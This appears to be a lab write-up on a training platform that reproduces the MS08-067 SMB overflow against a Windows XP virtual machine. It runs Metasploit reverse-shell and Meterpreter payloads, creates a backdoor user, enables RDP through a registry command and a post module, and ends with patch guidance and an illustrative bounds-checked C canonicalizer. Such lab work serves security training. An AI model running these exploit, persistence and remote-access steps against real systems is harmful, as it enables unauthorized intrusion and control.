E027 - Operating System Vulnerability Verification and Hardening - MS08-067 Vulnerability Exploitation and Security Hardening

Foreword

Hello everyone, in this chapter I will reproduce the MS08-067 vulnerability, which was once very famous, and all the experts are welcome to join me.

Overview of MS08-067

The full name of the MS08-067 vulnerability is “Windows Server Service RPC Request Buffer Overflow Vulnerability”. The attacker uses SMB port 445, which is open by default on the victim host, to send a specially crafted RPC (Remote Procedure Call) request that causes a stack buffer overflow, which can be exploited to achieve remote code execution.

Principles

The MS08-067 vulnerability is triggered when the NetPathCanonicalize function of the Server service is called over the MSRPC-over-SMB channel. When NetPathCanonicalize is invoked to access a remote host, it calls the NetpwPathCanonicalize function to normalize the remote access path. NetpwPathCanonicalize contains a stack buffer overflow in this normalization, which can be exploited to achieve remote code execution.

This vulnerability allows remote code execution when an affected system receives a crafted RPC request, letting an attacker run arbitrary code without authentication. Because no authentication is needed, the vulnerability can also be used by worms.
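To make the principle concrete, here is an added illustration written for this page (not Microsoft's netapi32 code) of the kind of path normalization NetpwPathCanonicalize performs, including the bounds check the unpatched function lacked when walking back over a ".." component: a path with more ".." components than components before them is rejected instead of stepping before the start of the buffer. It assumes backslash separators and always produces an absolute result.

```c
#include <string.h>

/*
 * Simplified canonicalizer for backslash-separated paths: resolves "." and
 * ".." components of `in` into `out` (capacity outsz). Returns 0 on success,
 * -1 if the result would not fit or if a ".." would climb above the root,
 * the input class on which an unchecked backward walk (as in the unpatched
 * NetpwPathCanonicalize) runs off the start of its stack buffer.
 */
int canonicalize_path(const char *in, char *out, size_t outsz)
{
    size_t len = 0;          /* bytes of out in use; out is kept as "\a\b" */
    const char *p = in;
    if (outsz < 2)
        return -1;
    while (*p) {
        const char *start = p;          /* one component, up to the next '\' */
        while (*p && *p != '\\')
            p++;
        size_t clen = (size_t)(p - start);
        if (*p == '\\')
            p++;                        /* consume the separator */
        if (clen == 0 || (clen == 1 && start[0] == '.'))
            continue;                   /* empty or "." component: drop it */
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            /* "..": drop the previous component. This is the bounds check
             * the vulnerable code lacked: never step before out[0]. */
            if (len == 0)
                return -1;
            while (len > 0 && out[len - 1] != '\\')
                len--;                  /* back to the previous separator */
            len--;                      /* and drop that separator too */
            continue;
        }
        if (len + 1 + clen >= outsz)    /* '\' + component + NUL must fit */
            return -1;
        out[len++] = '\\';
        memcpy(out + len, start, clen);
        len += clen;
    }
    if (len == 0)                       /* everything cancelled out: root */
        out[len++] = '\\';
    out[len] = '\0';
    return 0;
}
```

Calling it with a constructed path such as "\share\docs\..\readme.txt" yields "\share\readme.txt", while "\a\..\..\b" is rejected with -1 because the second ".." would walk above the root.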

Reproduction platform

==================

Zhongke Panyun P9

==================

Network topology

Task environment description:

Server scenario: p9_kali-7 (username: root; password: toor)

Server scenario operating system: Kali Linux, 192.168.1.102

==============================================
Server scenario: p9_xp-6 (username: admin; password: 123456)

Server scenario operating system: Microsoft Windows XP, 192.168.1.106

Open the network topology, click the start option, and start the experimental virtual machines.

Reproduction process


Information gathering stage

Knowing the IP address of the target server, first confirm that it is alive and run a preliminary scan against it:

Use the nmap scanner against the server, focusing on verifying whether the MS08-067 vulnerability exists on the target:

Call the MS08-067 script from nmap's vulnerability scanning scripts to scan and verify it:
nmap -O -n -T4 -p445 --script=smb-vuln-ms08-067 192.168.1.106

The areas marked in white in the output are the key verification points. This initially confirms that the target server is likely vulnerable; further verification follows.

Start the MSF penetration testing framework:

msfconsole

Call the related module: exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

or

search ms08-067
use 0

View the required parameters:

show options

Seeing that the target address must be set, I set it:

set rhosts 192.168.1.106

By default the module's payload opens the post-exploitation (Meterpreter) console. We have two options: keep the default and enter the post-exploitation console, or directly enter a shell on the target server system. We first use the payload that opens the target system shell directly; both payload commands are listed below, so use whichever you need:

set payload windows/shell/reverse_tcp ## directly enter the target server system shell
set payload windows/meterpreter/reverse_tcp ## enter the post-exploitation console

When setting parameters you can press the Tab key a few times to display all of the module's settable parameters.

For example, here I am calling the windows/shell/reverse_tcp payload:

If the listening address is not set, set it as well:

set lhost 192.168.1.102

Use the show targets command to display the target types (operating system, software version, etc.) supported by this exploit module.

You can use target 0 (automatic) or choose one yourself:

show targets

In this experiment we set the target operating system number to 34.

We set it:

set target 34

Use the check command to detect whether the target machine has this vulnerability:

check

Attack phase

Use the exploit command to run the overflow module and enter the target server shell:

exploit

After entering, check which ports are open on the target server:

netstat -an

Post-exploitation stage

Now create a backdoor user and try to log in to the target system's desktop:

The traditional method from the lesson plan:

I won't go into the details here and just show the process:

The backdoor user has been created; now open port 3389:

Use the following REG ADD command to enable Remote Desktop (port 3389):

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Successfully entered the target server desktop.

My personal penetration ideas:

The earlier steps stay the same; only the payload is changed to the windows/meterpreter/reverse_tcp module:

set payload windows/meterpreter/reverse_tcp

After verifying as before, attack:

The attack succeeds; enter the post-exploitation stage and create a backdoor user.

Call the enable_rdp module to enable the 3389 remote desktop port and service, then connect to the remote desktop:

run post/windows/manage/enable_rdp

Success; connect to the target server's remote desktop:

rdesktop 192.168.1.106

Entered successfully.

Hardening suggestions

The first is system updates

Most customers have automatic updating enabled and do not need to take any action, because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating must check for updates and install this update manually. For information about specific configuration options in automatic updating, and for administrators, enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply this update immediately using update management software or check for updates using the Microsoft Update service.

Among the affected software, find your operating system and click it to download the corresponding patch package. The format is. The system version used in this experiment is Windows XP SP3.

Security Update for Windows Vista for x64-based Systems (KB958644)

http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617-58e8cdda8c7e/Windows6.0-KB958644-x64.msu

Here are the download links for patch packages for other system versions:

=======================================================================

Security Update for Windows Vista (KB958644)

http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu

Security Update for Windows Server 2008 x64 Edition (KB958644)

http://download.microsoft.com/download/0/f/4/0f425c69-4a1f-4654-b4f8-476a5b1bae1d/Windows6.0-KB958644-x64.msu

Security Update for Windows Server 2003 x64 Edition (KB958644)

http://download.microsoft.com/download/9/8/e/98eff1c8-f2e2-43a4-abf7-7fb0315a09f7/WindowsServer2003.WindowsXP-KB958644-x64-CHS.exe

Security Update for Windows Server 2003 (KB958644)

http://download.microsoft.com/download/8/4/4/84403755-aa0a-41ba-bded-7cbbc8dc218c/WindowsServer2003-KB958644-x86-CHS.exe

Security Update for Windows Server 2008 (KB958644)

http://download.microsoft.com/download/4/9/8/498e39f6-9f49-4ca5-99dd-761456da0012/Windows6.0-KB958644-x86.msu

Windows 2000 Security Update (KB958644)

http://download.microsoft.com/download/4/9/7/49751d3a-e93b-48fb-95de-2a229e602004/Windows2000-KB958644-x86-CHS.EXE

Security Update for Windows Vista for x64-based Systems (KB958644)

http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617-58e8cdda8c7e/Windows6.0-KB958644-x64.msu

Security Update for Windows XP (KB958644)

http://download.microsoft.com/download/a/5/f/a5fcaabe-ff81-4d4f-972e-865bdc60dcbf/WindowsXP-KB958644-x86-CHS.exe

English operating system KB958644 patch download addresses:

Security Update for Windows 2000 (KB958644)

http://download.microsoft.com/download/4/a/3/4a36c1ea-7555-4a88-98ac-b0909cc83c18/Windows2000-KB958644-x86-ENU.EXE

Security Update for Windows Server 2003 x64 Edition (KB958644)

http://download.microsoft.com/download/f/7/6/f761e8ee-caad-4528-aa47-ed5d744be523/WindowsServer2003.WindowsXP-KB958644-x64-ENU.exe

Security Update for Windows 7 Pre-Beta for Itanium-based Systems (KB958644)

http://download.microsoft.com/download/f/6/3/f639c726-86bb-4f3a-a783-5e03fc665af4/Windows6.1-KB958644-ia64.msu

Security Update for Windows XP x64 Edition (KB958644)

http://download.microsoft.com/download/5/8/1/5811b6cc-5884-4486-b05d-de69f0e94f67/WindowsServer2003.WindowsXP-KB958644-x64-ENU.exe

Security Update for Windows Vista (KB958644)

http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu

Security Update for Windows Server 2003 for Itanium-based Systems (KB958644)

http://download.microsoft.com/download/1/8/e/18efd717-b406-4a19-98d5-5ee80351bedf/WindowsServer2003-KB958644-ia64-ENU.exe

Security Update for Windows 7 Pre-Beta (KB958644)

http://download.microsoft.com/download/c/0/7/c07fca67-b0e2-4c9c-9c1f-9cde37131747/Windows6.1-KB958644-x86.msu

Security Update for Windows Server 2008 x64 Edition (KB958644)

http://download.microsoft.com/download/0/f/4/0f425c69-4a1f-4654-b4f8-476a5b1bae1d/Windows6.0-KB958644-x64.msu

Security Update for Windows 7 Pre-Beta x64 Edition (KB958644)

http://download.microsoft.com/download/d/4/6/d467b363-8825-4fa9-87fb-7cb4a9cedb56/Windows6.1-KB958644-x64.msu

Security Update for Windows XP (KB958644)

http://download.microsoft.com/download/4/f/a/4fabe08e-5358-418b-81dd-d5038730b324/WindowsXP-KB958644-x86-ENU.exe

Security Update for Windows Server 2008 for Itanium-based Systems (KB958644)

http://download.microsoft.com/download/8/b/c/8bc5a4e6-ba02-4bb9-947f-f253caeaa271/Windows6.0-KB958644-ia64.msu

Security Update for Windows Server 2003 (KB958644)

http://download.microsoft.com/download/e/e/3/ee322649-7f38-4553-a26b-a2ac40a0b205/WindowsServer2003-KB958644-x86-ENU.exe

Security Update for Windows Server 2008 (KB958644)

http://download.microsoft.com/download/4/9/8/498e39f6-9f49-4ca5-99dd-761456da0012/Windows6.0-KB958644-x86.msu

Security Update for Windows Vista for x64-based Systems (KB958644)

http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617-58e8cdda8c7e/Windows6.0-KB958644-x64.msu

=======================================================================

Select your system's language, click Download, and then install this patch package on the target system.

Click WindowsXP-KB958644-x86-CHS.exe to install the patch. After the installation completes and the system restarts, use the MSF module again to verify that the target machine can no longer be exploited.

End of chapter

This time the MS08-067 operation was reproduced with two approaches. The traditional approach suits older Kali versions and the default workflow, opening 3389 by modifying the registry. My personal approach uses the module to open 3389 with one command. Each approach has its own advantages; learn from them as appropriate, and you are also welcome to leave messages with improvements.
